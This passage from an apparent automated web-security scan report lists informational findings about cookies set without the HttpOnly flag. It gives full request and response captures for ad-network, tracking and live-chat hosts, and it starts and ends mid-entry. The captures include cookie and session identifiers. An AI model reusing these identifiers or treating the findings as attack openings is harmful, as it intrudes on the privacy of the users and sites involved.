P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Thu, 21 Apr 2011 23:51:09 GMT
Date: Sun, 24 Apr 2011 15:24:15 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1246

<IFRAME SRC="http://ad.doubleclick.net/adi/N3016.158901.DATAXU/B5398270.22;sz=728x90;pc=[TPAS_ID];ord=NERCNDQwOTEwMDBERUFGNjBBRTU3RkNEMzhCNTMzNzJ8R0ZHWXhySXJOM3wxMzAzNjU4NjQ1MjkyfDF8MEZKak0yUU5jS3wwUm
...[SNIP]...

18.238. http://cdn.w55c.net/i/0RilLTaqf1_958911823.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RilLTaqf1_958911823.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0RilLTaqf1_958911823.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUF8R0ZVeWQxclZsYXwxMzAzNjYzODY0NzY1fDF8MEZTb3MxV1lvZXwwUmlsTFRhcWYxfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDYxMTg4MQ&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRU9gAKcZcK7GWLyoFKWsZOaIGHRR4fdymMmw&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZTb3MxV1lvZQ&ciu=MFJpbExUYXFmMQ&reqid=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUE&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=611&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681865&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663865478&bpp=16&shv=r20110420&jsv=r20110415&correlator=1303663865496&frm=1&adk=2614322350&ga_vid=1538346491.1303663866&ga_sid=1303663866&ga_hid=2007194349&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&eid=33895132&fu=4&ifi=1&dtd=121
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:56:20 GMT
Cache-Control: no-cache, no-store
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 16:50:11 GMT
Accept-Ranges: bytes
Last-Modified: Wed, 06 Apr 2011 17:50:22 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1380

<IFRAME SRC="http://ad.doubleclick.net/adi/N4637.158901.6939390485621/B5385253.8;sz=160x600;pc=[TPAS_ID];ord=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUF8R0ZVeWQxclZsYXwxMzAzNjYzODY0NzY1fDF8MEZTb3MxV1l
...[SNIP]...

18.239. http://cdn.w55c.net/i/0RkPQrQRFy_1341446950.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RkPQrQRFy_1341446950.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0RkPQrQRFy_1341446950.html?rtbhost=rts-rr11.sldc.dataxu.net&btid=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEJ8R0Z4SVo3ZkJBZHwxMzAzNjU4NDAyNTg0fDF8MEYzTllTc2l3d3wwUmtQUXJRUkZ5fEVYXzEwMjM0NzcyMDZ8MTM4OTYy&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_oAAIeAsK5X6IMLFNiw5YQb_V37aYux-2HA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEYzTllTc2l3dw&ciu=MFJrUFFyUVJGeQ&reqid=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=138&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676403&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658403541&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658403548&frm=1&adk=513358139&ga_vid=764788207.1303658404&ga_sid=1303658404&ga_hid=1212953574&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=10
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:20:14 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Fri, 01 Apr 2011 14:32:11 GMT
Date: Sun, 24 Apr 2011 15:19:34 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1238

<IFRAME SRC="http://ad.doubleclick.net/adi/N553.158901.DATAXU/B5114832.6;sz=728x90;pc=[TPAS_ID];ord=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEJ8R0Z4SVo3ZkJBZHwxMzAzNjU4NDAyNTg0fDF8MEYzTllTc2l3d3wwUmtQ
...[SNIP]...

18.240. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rl7Vm3VTU_682412618.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679995&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661995029&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661995034&frm=1&adk=2614322350&ga_vid=1092593501.1303661995&ga_sid=1303661995&ga_hid=294155726&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:13:06 GMT
Server: w55c.net
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:19:53 GMT
Cache-Control: no-cache, no-store
content-type: text/html
P3P: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Tue, 19 Apr 2011 21:53:32 GMT
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 409
pragma: no-cache
Via: 1.1 mdw061001 (MII-APC/1.6)
Content-Length: 2174

<IFRAME SRC="http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB
...[SNIP]...

18.241. http://cdn.w55c.net/i/0RphY9og2j_721933665.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RphY9og2j_721933665.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0RphY9og2j_721933665.html?rtbhost=rts-rr16.sldc.dataxu.net&btid=NERCNDNGQjEwMDAxRUMzMjBBRTUwM0QwMURERTA2NzN8R0ZoUUl3d1VBb3wxMzAzNjU4NDE5MTYzfDF8MEZ3bmdyZnBiQXwwUnBoWTlvZzJqfEVYXzEwMjM0NzcyMDZ8MTUxMDY1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_sQAB7DIK5QPQHd4Gc3u4xT_O8KcCluKhzg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZ3bmdyZnBiQQ&ciu=MFJwaFk5b2cyag&reqid=NERCNDNGQjEwMDAxRUMzMjBBRTUwM0QwMURERTA2NzM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=151&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676420&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658420103&bpp=6&shv=r20110420&jsv=r20110415&correlator=1303658420112&frm=1&adk=513358139&ga_vid=35710902.1303658420&ga_sid=1303658420&ga_hid=969894465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:20:33 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Wed, 30 Mar 2011 19:16:28 GMT
Date: Sun, 24 Apr 2011 15:19:52 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 419

<iframe src="http://altfarm.mediaplex.com/ad/fm/3992-125865-29115-2?mpt=[CACHEBUSTER]&mpvc=" width=728 height=90 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no bordercolor="
...[SNIP]...

18.242. http://cdn.w55c.net/i/0RuFuATqDZ_452086828.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RuFuATqDZ_452086828.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0RuFuATqDZ_452086828.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NERCNDNGOEEwMDAwQzA2QjBBRTUzQThBMjczNjIyMjd8R0ZKczh3VGxEUHwxMzAzNjU4MzgwMTAwfDF8MEZwU0VZRzVFdXwwUnVGdUFUcURafEVYXzEwMjM0NzcyMDZ8ODUwMDAw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_igAAwGsK5TqKJzYiJ8PEWQEBkOCrFi1HVQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZwU0VZRzVFdQ&ciu=MFJ1RnVBVHFEWg&reqid=NERCNDNGOEEwMDAwQzA2QjBBRTUzQThBMjczNjIyMjc&ccw=SUFCMSMwLjB8SUFCOCMwLjA&bp=850&zc=NzUyMDc&v=0&s=http%3A%2F%2F& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658381022&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303658381041&frm=1&adk=513358139&ga_vid=971996930.1303658381&ga_sid=1303658381&ga_hid=548328206&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&eid=33895132&fu=4&ifi=1&dtd=27
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:19:39 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Mon, 11 Apr 2011 19:58:56 GMT
Date: Sun, 24 Apr 2011 15:17:54 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 731

<iframe id='a22bf83a' name='a22bf83a' src='http://d.w55c.net/afr.php?zoneid=768&amp;cb=NERCNDNGOEEwMDAwQzA2QjBBRTUzQThBMjczNjIyMjd8R0ZKczh3VGxEUHwxMzAzNjU4MzgwMTAwfDF8MEZwU0VZRzVFdXwwUnVGdUFUcURafEVYX
...[SNIP]...

18.243. http://cf.addthis.com/red/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cf.addthis.com
Path:   /red/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/p.json?rb=0&gen=1000&gen=100&sid=4db4511e2659ba2c&callback=_ate.ad.hrr&pub=vpls&uid=4dab4fa85facd099&url=http%3A%2F%2Fkrypt.com%2F&1npnqde HTTP/1.1
Host: cf.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%7D..1303529621.1FE|1303529621.60|1303408224.66; dt=X; psc=3; uid=4dab4fa85facd099; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Sun, 24 Apr 2011 16:34:36 GMT
Set-Cookie: di=1303529621.60|1303529621.1FE; Domain=.addthis.com; Expires=Tue, 23-Apr-2013 16:34:36 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 24-May-2011 16:34:36 GMT; Path=/
Content-Type: text/javascript
Content-Length: 88
Date: Sun, 24 Apr 2011 16:34:35 GMT
Connection: close

_ate.ad.hrr({"urls":[],"segments":[],"loc":"MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NDAwVg=="});

18.244. http://chat.echomail.com/livezilla/server.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://chat.echomail.com
Path:   /livezilla/server.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /livezilla/server.php?request=track&output=jcrpt&nse=0.4210994567256421 HTTP/1.1
Host: chat.echomail.com
Proxy-Connection: keep-alive
Referer: http://engine03.echomail.com/icomee-regs/trial/MonitoringTrial.jsp?m=2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:49:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Cache-Control: no-cache, must-revalidate
Set-Cookie: livezilla=YToxOntzOjg6ImZvcm1fMTExIjtzOjA6IiI7fQ%3D%3D; expires=Sat, 09-Jul-2011 00:49:53 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 34277

var lz_title_timer;
var lz_title_step = 0;
var lz_title_modes = new Array(document.title,"<!--lang_client_new_messages-->");
var lz_standard_title = document.title;
var lz_document_head = document
...[SNIP]...

18.245. http://chat.india.interactive.com/livezilla/server.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://chat.india.interactive.com
Path:   /livezilla/server.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /livezilla/server.php?request=track&start=1303691656062&browid=18a71fa915&url=aHR0cDovL2VuZ2luZTAzLmVjaG9tYWlsLmNvbS9pY29tZWUtcmVncy90cmlhbC9Nb25pdG9yaW5nVHJpYWwuanNwP209Mg&livezilla=58a00c1416&cd=16&rh=1200&rw=1920&rf=&tzo=-5&code=&en=&ee=&ec=&dc=RWNob01haWw&cf0=&cf1=&cf2=&cf3=&cf4=&cf5=&cf6=&cf7=&cf8=&cf9=&geo_rid=7 HTTP/1.1
Host: chat.india.interactive.com
Proxy-Connection: keep-alive
Referer: http://engine03.echomail.com/icomee-regs/trial/MonitoringTrial.jsp?m=2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:50:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Cache-Control: no-cache, must-revalidate
Set-Cookie: livezilla=YToxOntzOjY6InVzZXJpZCI7czoxMDoiNThhMDBjMTQxNiI7fQ%3D%3D; expires=Sat, 09-Jul-2011 00:50:22 GMT
Content-Length: 76
Content-Type: text/html; charset=UTF-8

lz_tracking_set_sessid("58a00c1416","18a71fa915");lz_tracking_callback(220);

18.246. http://citi.bridgetrack.com/track/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://citi.bridgetrack.com
Path:   /track/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /track/?id=8935&r=[RANDOM] HTTP/1.1
Host: citi.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://www.identitymonitor.citi.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 43
Content-Type: image/GIF
Expires: Sat, 23 Apr 2011 19:57:19 GMT
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: CitiBT=GUID=956084406FDE47BC8F8385021564D64B; expires=Wed, 18-Apr-2012 04:00:00 GMT; path=/
Set-Cookie: CitiBTSES=SID=87071D867EF64D5FB07ECC0998F93B6F; path=/
Date: Sun, 24 Apr 2011 19:57:18 GMT
Connection: close

GIF89a.............!.......,...........L..;

18.247. http://clk.atdmt.com/go/253732016/direct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /go/253732016/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/253732016/direct;ai.194941096;ct.1/01 HTTP/1.1
Host: clk.atdmt.com
Proxy-Connection: keep-alive
Referer: http://ec.atdmt.com/ds/5RTLCLFLKLFL/v120_myIdentitymyLife_red/160x600_blankJobRed.swf?ver=1&clickTag1=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW